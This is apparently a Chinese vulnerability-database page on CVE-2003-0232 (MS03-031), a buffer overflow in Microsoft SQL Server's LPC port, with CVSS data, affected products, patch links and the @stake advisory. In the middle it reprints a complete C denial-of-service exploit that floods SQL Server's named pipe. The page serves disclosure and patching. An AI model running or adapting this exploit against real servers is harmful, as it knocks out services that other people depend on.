CVE-2003-0232
CVSS7.2
发布时间 :2003-08-27 00:00:00
修订时间 :2008-09-10 15:18:19
NMCOEPS    

[原文]Microsoft SQL Server 7, 2000, and MSDE allows local users to execute arbitrary code via a certain request to the Local Procedure Calls (LPC) port that leads to a buffer overflow.


[CNNVD]Microsoft SQL Server LPC端口本地缓冲区溢出漏洞(MS03-031)(CNNVD-200308-122)

        
        Microsoft SQL Server是微软公司开发和维护的大型数据库系统。
        Microsoft SQL Server在处理发送给LPC端口的畸形消息不正确,本地攻击者可以利用这个漏洞进行缓冲区溢出攻击,可能以数据库进行权限在系统上执行任意指令。
        Microsoft SQL Server使用LPC(本地过程调用)来实现部分进程间通信,此端口提供的服务可以被任何用户访问。任何本地用户可以发送信息通过这个端口到SQL服务。通过发送特殊构建的消息到这个端口,可以覆盖堆栈中的信息,允许攻击者在SQL进程上下文执行任意代码。允许用户对数据库文件进行读写。
        

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:microsoft:sql_server:2000:sp3Microsoft SQLServer 2000 Service Pack 3
cpe:/a:microsoft:sql_server:2000::desktop_engine
cpe:/a:microsoft:sql_server:2000:sp1Microsoft SQLServer 2000 Service Pack 1
cpe:/a:microsoft:sql_server:2000:sp3aMicrosoft SQLServer 2000 Service Pack 3a
cpe:/a:microsoft:data_engine:1.0Microsoft data_engine 1.0
cpe:/a:microsoft:sql_server:7.0:sp4Microsoft SQL Server 7.0 Service Pack 4
cpe:/a:microsoft:sql_server:7.0:sp1Microsoft SQL Server 7.0 Service Pack 1
cpe:/a:microsoft:sql_server:2000:sp2Microsoft SQLServer 2000 Service Pack 2
cpe:/a:microsoft:sql_server:7.0:sp3Microsoft SQL Server 7.0 Service Pack 3
cpe:/a:microsoft:sql_server:7.0:sp2Microsoft SQL Server 7.0 Service Pack 2
cpe:/a:microsoft:sql_server:2000Microsoft SQL Server 2000
cpe:/a:microsoft:sql_server:7.0Microsoft SQLServer 7.0

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:303SQL Server LPC Port Buffer Overflow
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0232
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0232
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200308-122
(官方数据源) CNNVD

- 其它链接及资源

http://www.kb.cert.org/vuls/id/584868
(UNKNOWN)  CERT-VN  VU#584868
http://www.microsoft.com/technet/security/bulletin/MS03-031.asp
(VENDOR_ADVISORY)  MS  MS03-031
http://www.atstake.com/research/advisories/2003/a072303-3.txt
(VENDOR_ADVISORY)  ATSTAKE  A072303-3

- 漏洞信息

Microsoft SQL Server LPC端口本地缓冲区溢出漏洞(MS03-031)
高危 边界条件错误
2003-08-27 00:00:00 2006-09-01 00:00:00
本地  
        
        Microsoft SQL Server是微软公司开发和维护的大型数据库系统。
        Microsoft SQL Server在处理发送给LPC端口的畸形消息不正确,本地攻击者可以利用这个漏洞进行缓冲区溢出攻击,可能以数据库进行权限在系统上执行任意指令。
        Microsoft SQL Server使用LPC(本地过程调用)来实现部分进程间通信,此端口提供的服务可以被任何用户访问。任何本地用户可以发送信息通过这个端口到SQL服务。通过发送特殊构建的消息到这个端口,可以覆盖堆栈中的信息,允许攻击者在SQL进程上下文执行任意代码。允许用户对数据库文件进行读写。
        

- 公告与补丁

        厂商补丁:
        Microsoft
        ---------
        Microsoft已经为此发布了一个安全公告(MS03-031)以及相应补丁:
        MS03-031:Cumulative Patch for Microsoft SQL Server (Q815495)
        链接:
        http://www.microsoft.com/technet/security/bulletin/MS03-031.asp

        补丁下载:
        Microsoft SQL Server 7.0:
        
        http://microsoft.com/downloads/details.aspx?FamilyId=FE5B0892-A5C9-44C2-9B42-0D291E9C1636&displaylang=en

        Microsoft SQL 2000 32-bit Edition:
        
        http://microsoft.com/downloads/details.aspx?FamilyId=9814AE9D-BD44-40C5-ADD3-B8C99618E68D&displaylang=en

        Microsoft SQL 2000 64-bit Edition:
        
        http://microsoft.com/downloads/details.aspx?FamilyId=72336508-057A-4E86-8F2E-CB1BD3A6A44B&displaylang=en

- 漏洞信息 (65)

MS Windows SQL Server Denial of Service Remote Exploit (MS03-031) (EDBID:65)
windows dos
2003-07-25 Verified
0 refdom
N/A [点击下载]
////////////////////////////////////////////////////////////////
//      
//      Microsoft SQL Server DoS Remote Exploit (MS03-031)
//                    By refdom of xfocus
//    
////////////////////////////////////////////////////////////////

#include <stdio.h>
#include <stdlib.h>
#include <windows.h>


void Usage()
{
	printf("******************************************\n");
	printf("exp for Microsoft SQL Server DoS(MS03-031)\n\n");
	printf("\t Written by Refdom\n");
	printf("\t Email: refdom xfocus org\n");
	printf("\t Homepage: www.xfocus.org\n\n");
	printf("Usage: DOSMSSQL.exe server buffersize\n");
	printf("eg: DOSMSSQL.exe192.168.0.1 9000\n\n");
	printf("The buffersize depends on service pack level.\n");
	printf("I test it on my server: windows 2000, mssqlserver no sp.\n");
	printf("when buffersize is 9000, the server can be crashed.\n");
	printf("\n");
	printf("*******************************************\n\n");
}


int main(int argc, char* argv[])
{
	char lpPipeName[50];
	char *lpBuffer = NULL;
	unsigned long ulSize = 0;

	BOOL bResult;
	DWORD dwWritten = 0, dwMode;
	HANDLE hPipe;

	Usage();

	printf("Starting...\n");

	if (argc != 3)
		goto Exit0;
	
	if (strlen(argv[1]) < 20)
	{
		sprintf(lpPipeName, "\\\\%s\\\\.\\pipe\\sql\\query", argv[1]);
	}
	else
	{
		printf("Error!server\n");
		goto Exit0;
	}

	ulSize= atol(argv[2]);

	lpBuffer = (char*)malloc(ulSize + 2);
	if (NULL == lpBuffer)
	{
		printf("malloc error!\n");
		goto Exit0;
	}

	memset(lpBuffer, 0, ulSize + 2);
	memset(lpBuffer, 'A', ulSize);
	*lpBuffer = '\x12';
	*(lpBuffer + 1) = '\x01';
	*(lpBuffer + 2) = '\x00';
	
	printf("Connecting Server...\n");

	hPipe = CreateFile(lpPipeName, 
					GENERIC_READ | GENERIC_WRITE,
					0,
					NULL,
					OPEN_EXISTING,
					0,
					NULL);
	if (INVALID_HANDLE_VALUE == hPipe)
	{
		printf("Error!Connect server!%d\n", GetLastError());
		goto Exit0;
	}

   dwMode = PIPE_READMODE_MESSAGE; 
   bResult = SetNamedPipeHandleState( 
      hPipe,    // pipe handle 
      &dwMode,  // new pipe mode 
      NULL,     // don't set maximum bytes 
      NULL);    // don't set maximum time 
   if (!bResult)
   {
		printf("Error!SetNamedPipeHandleState.%d\n", GetLastError());
		goto Exit0;
   }

	bResult = WriteFile(hPipe, lpBuffer, ulSize + 1, &dwWritten, NULL);

	if (!bResult)
	{
		printf("\n\tError!WriteFile.%d\n\n", GetLastError());
		printf("When see the error message, the target may be crashed!!\n\n");
		goto Exit0;
	}

Exit0:
	
	return 0;
}

// milw0rm.com [2003-07-25]
		

- 漏洞信息 (F31429)

Atstake Security Advisory 03-07-23.3 (PacketStormID:F31429)
2003-07-24 00:00:00
Atstake,Andreas Junestam  atstake.com
advisory,local
CVE-2003-0232
[点击下载]

Atstake Security Advisory A072303-3 - By sending a specially crafted message to the local LPC port for Microsoft SQL Server, it is possible to overwrite information stored on the stack. This would allow an attacker to execute code under SQL Server's credentials thereby escalating privileges. This would then allow the user to read and write access to the database files. If the SQL Server is running under the Administrator or Local System account this would enable system compromise.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1


                             @stake Inc.
                           www.atstake.com 

                          Security Advisory

 
Advisory Name: Microsoft SQL Server local code execution
 Release Date: 07/23/2003
  Application: Microsoft SQL Server 7, 2000, MSDE
     Platform: Windows NT/2000/XP
     Severity: Local code execution / Denial of Service
       Author: Andreas Junestam (andreas@atstake.com)
Vendor Status: Microsoft has patch available
CVE Candidate: CAN-2003-0232
    Reference: www.atstake.com/research/advisories/2003/a072303-3.txt


Overview:

Microsoft SQL Server uses LPC (Local Procedure Calls) to
implement some of its inter-processes communication. The
port providing this service can be used by anyone. By sending
a specially crafted message to SQL Server through this port,
an attacker can overwrite certain parts of memory and thus
execute code using the SQL Server's credentials.


Detailed Description:

Microsoft SQL Server uses different ways of communicating with
a client locally, one of them is over a LPC port. This port
can by used by any local user to send information to the SQL
Server service. By sending a specially crafted message to this
port it is possible to overwrite information stored on the
stack. This would allow an attacker to execute code under
SQL Server's credentials thereby escalating privileges. This
would then allow the user to read and write access to the
database files.  If the SQL Server is running under the
Administrator or Local System account this would enable
system compromise.

As with most SQL Server issues MSDE is effected.  MSDE is
included in many Microsoft and non-Microsoft products. A list
of products that includes MSDE is here:

http://www.sqlsecurity.com/DesktopDefault.aspx?tabindex=10&tabid=13


Vendor Response:

Microsoft was contacted on 02/05/2003

Microsoft has a bulletin and patch available:

http://www.microsoft.com/technet/security/bulletin/MS03-031.asp


Recommendation:

Install the vendor patch. If your SQL Server is running under
the Administrator or Local System account consider running SQL
Server under a less privileged account.


Common Vulnerabilities and Exposures (CVE) Information:

The Common Vulnerabilities and Exposures (CVE) project has assigned
the following names to these issues.  These are candidates for
inclusion in the CVE list (http://cve.mitre.org), which standardizes
names for security problems.

  CAN-2003-0232


@stake Vulnerability Reporting Policy:
http://www.atstake.com/research/policy/

@stake Advisory Archive:
http://www.atstake.com/research/advisories/

PGP Key:
http://www.atstake.com/research/pgp_key.asc

Copyright 2003 @stake, Inc. All rights reserved.

-----BEGIN PGP SIGNATURE-----
Version: PGP 8.0

iQA/AwUBPx75pUe9kNIfAm4yEQKqjwCgjN94EPfRFvtLd/4CHGjbW6QU/XIAoLKp
teXQzo5cqxIZY2OcMil/n9AC
=iMTE
-----END PGP SIGNATURE-----


    

- 漏洞信息

10123
Microsoft SQL Server LPC Packet Handling Local Overflow
Local Access Required Input Manipulation
Loss of Integrity Patch / RCS
Vendor Verified

- 漏洞描述

Microsoft SQL Server uses different ways of communicating with a client locally, one of them is over a LPC port. This port can by used by any local user to send information to the SQL Server service. By sending a specially crafted message to this port it is possible to overwrite information stored on the stack. This would allow an attacker to execute code under SQL Server's credentials thereby escalating privileges. This would then allow the user to read and write access to the database files. If the SQL Server is running under the Administrator or Local System account this would enable system compromise.

- 时间线

2003-07-23 Unknow
Unknow 2003-07-23

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Microsoft SQL Server LPC Port Request Buffer Overflow Vulnerability
Boundary Condition Error 8275
No Yes
2003-07-23 12:00:00 2009-07-11 10:56:00
Discovery is credited to Andreas Junstream of @Stake.

- 受影响的程序版本

Microsoft SQL Server 2000 Desktop Engine
+ Akiva WebBoard 6.1
+ Microsoft Access 2000
+ Microsoft Application Center 2000
+ Microsoft BizTalk Server 2000 Developer Edition
+ Microsoft BizTalk Server 2000 Enterprise Edition
+ Microsoft BizTalk Server 2000 Standard Edition
+ Microsoft BizTalk Server 2002 Developer Edition
+ Microsoft BizTalk Server 2002 Enterprise Edition
+ Microsoft Office 2000
+ Microsoft Project Central Server
+ Microsoft SharePoint Team Services from Microsoft
+ Microsoft Visio 2000 Enterprise Edition
+ Microsoft Visio Enterprise Network Tools
+ Microsoft Visual FoxPro 6.0
+ Microsoft Visual Studio 6.0
+ Microsoft Visual Studio .NET Academic Edition 0
+ Microsoft Visual Studio .NET Enterprise Architect Edition
+ Microsoft Visual Studio .NET Enterprise Developer Edition
+ Microsoft Visual Studio .NET Professional Edition
+ SmartMax Software MailMax 5.0
+ Veritas Software Backup Exec for Windows Servers 9.0
Microsoft SQL Server 2000 SP3a
Microsoft SQL Server 2000 SP3
Microsoft SQL Server 2000 SP2
Microsoft SQL Server 2000 SP1
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
Microsoft SQL Server 2000
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0
Microsoft SQL Server 7.0 SP4
- Microsoft SQL Server 7.0
- Microsoft SQL Server 7.0
Microsoft SQL Server 7.0 SP3
- Microsoft SQL Server 7.0
- Microsoft SQL Server 7.0
Microsoft SQL Server 7.0 SP2
- Microsoft SQL Server 7.0
- Microsoft SQL Server 7.0
Microsoft SQL Server 7.0 SP1
- Microsoft SQL Server 7.0
- Microsoft SQL Server 7.0
Microsoft SQL Server 7.0
- Microsoft BackOffice 4.5
- Microsoft BackOffice 4.5
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0
Microsoft Data Engine (MSDE) 1.0
+ Affymetrix Microarray Suite Software 5.0.1
+ Affymetrix Microarray Suite Software 5.0.1
+ Affymetrix Microarray Suite Software 5.0.1
+ Affymetrix Microarray Suite Software 5.0
+ Affymetrix Microarray Suite Software 5.0
+ Affymetrix Microarray Suite Software 5.0
+ Altiris Deployment Server 5.5
+ Altiris Deployment Server 5.5
+ Altiris Deployment Server 5.5
+ Altiris Deployment Server 5.0.1
+ Altiris Deployment Server 5.0.1
+ Altiris Deployment Server 5.0.1
+ Centennial UK Ltd Centennial Discovery 4.4
+ Centennial UK Ltd Centennial Discovery 4.4
+ Centennial UK Ltd Centennial Discovery 4.4
+ Compaq Insight Manager 7.0 SP1
+ Compaq Insight Manager 7.0 SP1
+ Compaq Insight Manager 7.0 SP1
+ Compaq Insight Manager 7.0
+ Compaq Insight Manager 7.0
+ Compaq Insight Manager 7.0
+ Gerber Technology WebPDM 3.9
+ Gerber Technology WebPDM 3.9
+ Gerber Technology WebPDM 3.9
+ McAfee ePolicy Orchestrator 2.5 SP1
+ McAfee ePolicy Orchestrator 2.5 SP1
+ McAfee ePolicy Orchestrator 2.5 SP1
+ McAfee ePolicy Orchestrator 2.5
+ McAfee ePolicy Orchestrator 2.5
+ McAfee ePolicy Orchestrator 2.5
+ McAfee ePolicy Orchestrator 2.0
+ McAfee ePolicy Orchestrator 2.0
+ McAfee ePolicy Orchestrator 2.0
+ McAfee ePolicy Orchestrator 1.1
+ McAfee ePolicy Orchestrator 1.1
+ McAfee ePolicy Orchestrator 1.1
+ McAfee ePolicy Orchestrator 1.0
+ McAfee ePolicy Orchestrator 1.0
+ McAfee ePolicy Orchestrator 1.0
- Microsoft Access 2000
- Microsoft Access 2000
- Microsoft Access 2000
- Microsoft Project Central Server
- Microsoft Project Central Server
- Microsoft Project Central Server
+ Microsoft SharePoint Team Services from Microsoft
+ Microsoft SharePoint Team Services from Microsoft
+ Microsoft SharePoint Team Services from Microsoft
- Microsoft Visual Studio 6.0
- Microsoft Visual Studio 6.0
- Microsoft Visual Studio 6.0
+ PowerQuest ControlCenter ST 2.0
+ PowerQuest ControlCenter ST 2.0
+ PowerQuest ControlCenter ST 2.0
+ PPM 2000 Incident Reporting and Investigation Management 5.1
+ PPM 2000 Incident Reporting and Investigation Management 5.1
+ PPM 2000 Incident Reporting and Investigation Management 5.1
+ Research In Motion Blackberry Enterprise Server 2.0 .0.65
+ Research In Motion Blackberry Enterprise Server 2.0 .0.65
+ Research In Motion Blackberry Enterprise Server 2.0 .0.65
+ Trend Micro Control Manager 2.5
+ Trend Micro Control Manager 2.5
+ Trend Micro Control Manager 2.5
+ Trend Micro Damage Cleanup Server 1.0
+ Trend Micro Damage Cleanup Server 1.0
+ Trend Micro Damage Cleanup Server 1.0
+ Vital Processing Services LLC POS-partner 2000 5.0.13
+ Vital Processing Services LLC POS-partner 2000 5.0.13
+ Vital Processing Services LLC POS-partner 2000 5.0.13
+ Vital Processing Services LLC POS-partner 2000 4.1.11
+ Vital Processing Services LLC POS-partner 2000 4.1.11
+ Vital Processing Services LLC POS-partner 2000 4.1.11
+ Websense Reporter 6.3.1
+ Websense Reporter 6.3.1
+ Websense Reporter 6.3.1

- 漏洞讨论

Microsoft SQL Server is prone to a buffer overflow issue. The issue may be exploited by sending malformed data via the LPC (Local Procedure Call) port. This issue could allow an attacker that is authenticated to the SQL Server to elevate their privilege level.

- 漏洞利用

Currently we are not aware of any exploits for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com &lt;mailto:vuldb@securityfocus.com&gt;.

- 解决方案

The vendor has released a patch to address this issue:


Microsoft SQL Server 2000 SP3

Microsoft Data Engine (MSDE) 1.0

Microsoft SQL Server 2000 Desktop Engine

Microsoft SQL Server 7.0 SP4

Microsoft SQL Server 2000 SP3a

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站